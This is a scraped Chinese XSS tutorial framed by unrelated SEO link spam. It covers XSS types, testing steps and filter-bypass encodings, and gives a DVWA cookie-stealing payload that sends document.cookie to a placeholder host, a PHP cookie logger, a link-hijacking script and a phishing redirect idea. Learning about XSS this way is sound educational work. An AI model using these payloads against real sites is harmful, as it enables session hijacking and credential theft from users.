当前位置: 首页 > news >正文

浙江省杭州市建设厅网站英文网站建设哪家强

浙江省杭州市建设厅网站,英文网站建设哪家强,义乌网站建设郭,做的网站很卡XSS原理及基础 定义 恶意攻击者会往Web页面里插入JS代码,当用户点击网页时.镶嵌的JS代码就会执行,从而达到恶意的特殊目的. 原因 程序对输入和输出的控制不够严格,导致payload输出到前段时被浏览器当做有效代码执行从而产生危害。 分类 存储型反射型DOM型 测…

XSS原理及基础

定义

恶意攻击者会往Web页面里插入JS代码,当用户点击网页时.镶嵌的JS代码就会执行,从而达到恶意的特殊目的.

原因

程序对输入和输出的控制不够严格,导致payload输出到前段时被浏览器当做有效代码执行从而产生危害。

分类

  1. 存储型
  2. 反射型
  3. DOM型

测试流程

  1. 目标站点找到输入点,
  2. 输入一组特殊字符+唯一识别字符,点击提交后,查看源码。先看看网页对特殊字符做了哪些过滤。
  3. 通过搜索定位到唯一的字符,确认是否可以构造js的条件
  4. 提交构造的脚本代码,看是否可以成功执行
    tips
  5. 查询接口容易出现反射型XSS,留言板容易出现存储型XSS
  6. 绕过过滤机制

存储型XSS原理

攻击者在页面上插入XSS代码,服务端将数据存入数据库当用户访问到存在XSS漏洞的页面时,服务端从数据库中取出数据展示到页面上,导致XSS代码执行,达到攻击效果.

可能存在的位置:一切用户可以输入的位置

XSS盗取cookie

Cookie是在HTTP协议下,服务器或脚本可以维护客户工作站上信息的一种方式.Cookie是由Web服务器保存在用户浏览器上的小文本文件.他可以包含有关用户信息.

  1. 存在反射型XSS漏洞的位置,可以利用以下链接来盗取Cookie(dvwa,xss low):
url?uname=<script>document.location='http://ip/cookie.php?cookie='+document.cookie</script>#cookie.php
<?php  
$cookie = $_GET['cookie'];
file_put_contents("cookie.txt", $cookie);
echo "ok";
?>

在这里插入图片描述劫持会话后可以进一步利用漏洞,修改配置文件

XSS篡改网页链接

篡改链接

<script>
window.onload=function(){
var link = document.getElementsByTagName("a");
for(j=0;j<link.length;j++){
link[j].herf="http://ip";
}
}
</script>apt-get install beef-xss

###XSS盗取用户信息
克隆网站登录页面,利用存储XSS设置跳转代码,如果用户访问即跳转到克隆网站的登录页面,用户输入登录,账号和密码被存储。

主要是用setookie,但是新版的Kali不能用。

探测XSS过程

  1. 构造一个不会被识别成恶意代码的字符串
  2. 查找该字符串的位置。
  3. 构造XSSpayload

属性中的XSS

xss事件
1.鼠标点击相应位置时,触发弹框。

onmouseover=alert(document.domain)>

选择列表的XSS

隐性参数XSS

SVG介绍

SVG意为可缩放矢量图形,使用XML格式定义图像。
可以通过,,,svg标签插入HTML文档。

<svg onload=····>

在这里插入图片描述注入点在一个被隐藏的位置,burp抓包后。
在这里插入图片描述

"><svg /onload=alert(document.domain)>%0a

HTML事件

  1. onlink:当鼠标点击时运行脚本。
  2. ondblclick:当双击鼠标运行脚本
  3. ondrag:当拖动元素时运行脚本
  4. ondragend:当拖动操作结束时运行脚本
  5. ondragenter:当元素被拖动至有效的拖放目标时运行脚本
  6. ondragleave:当元素离开有效拖放目标时运行脚本
  7. ondragover:当元素被拖放至有效目标上方时运行
  8. ondragstart:当拖动操作开始时运行脚本
  9. ondrop:当拖动元素正在被拖放时运行脚本
  10. onmousedown
  11. onmousemove
  12. onmouseout
  13. onmouseover
  14. onmouseup
  15. onmousewheel:当鼠标滚轮时运转
  16. onscroll

空格可以引发属性
在这里插入图片描述## JavaScript伪协议
javascript:js代码

javascript:alert('hello')

在这里插入图片描述伪协议XSS

"><a herf="javascript:alert(document.domain)">xss</a>r经过·html编码
"><a href="java&#115;cript:alert(document.domain)">1</a>

在IE中``可以闭合一个双引号,双写绕过,html编码绕过,unicode编码绕过。

  1. htmlspecialchars():把预定义的字符转换为HTML实体。```&,<,>,',"`````
  2. strip_tags():剥去字符串中HTML,PHP,XML的标签,并不是转换。
  3. htmlentities()可以处理用户输入防止XSS
  4. JS编码:数字形式\u后面加4位16进制数字或\x2位16进制数字
  5. HTML编码:实体编码一般以"&“开头”;“结尾,进制编码通常以”&#“开头加上字符的数值,”;"结尾,字符的数值可以是任意十进制ascii码或者unicode字符编码,十六进制需要在编码前加’x’.@
  6. 进制编码:十进制编码,String.fromChareCode(97,86),十六进制编码(“\x87\x65”),unicode编码(“\u0012\u0045”).
  7. url编码:%+十六进制
    进行编码是为了绕过某些xss_filter

XSS绕过

https://owasp.org/www-community/xss-filter-evasion-cheatsheet

XSS发生的位置

  1. GET:如果在URL中提交的参数中能够在页面中显示,就可能会有XSS。
  2. POST
  3. JSON
  4. 自定义http头中

XSS工具

  1. xsser
  2. xsstrike
http://www.yayakq.cn/news/868060/

相关文章:

  • 安居客官网网站怎么找网站后台
  • 济南建网站的网站网页前端开发用什么软件
  • 做网站找哪家好?聚禄鼎科技是一家给企业做网站的公司wordpress 获取作者
  • 荆门城乡建设局网站贵州网站制作
  • 建筑素材网站温州百度推广排名
  • 如何在网站发广告wordpress微信分享二维码生成
  • 小程序商店网址谷歌seo怎么做
  • html网页制作基础知识新乡网站优化公司
  • 网站利用e4a做app企业如何打造自己的品牌
  • 美食网站html代码文创设计网站
  • 泊头市建设网站wordpress首页缩略图不显示
  • 公司网站优化产品免费推广平台有哪些
  • 米思米网站订单取消怎么做重庆工程建设信息网官网入口
  • 网站开发美工的任务广州做网络服装的网站
  • 企业网站注册流程建设部网站官网证书编号
  • 广州网站建设+美词企业管理咨询是做什么
  • 做产品推广哪个网站好怎样免费制作网站
  • 制作网站的软件有那个免费温州免费个人网站制作公司
  • 南山网站建设方案书做营销网站企业
  • 做pc端的网站首页尺寸是多少寻找网站建设_网站外包
  • 百度免费收录网站网站网页和网址的关系
  • 赣州市网站开发佳木斯城乡建设局官方网站
  • 建筑人才网站wordpress下载验证
  • 设计一个学院网站注册域名之后怎么使用
  • 哪些行业需要做网站会计上网站建设做什么费用
  • 网站开发单子企业网站模板源代码下载
  • 建设一个大型电影网站百度链接提交入口
  • 销售网站开发与设计现状建e室内设计网专业的室内设计
  • 建设银行境外汇款申请书网站南宁百度seo软件
  • 网站改版的方式大致为lnmp wordpress 伪静态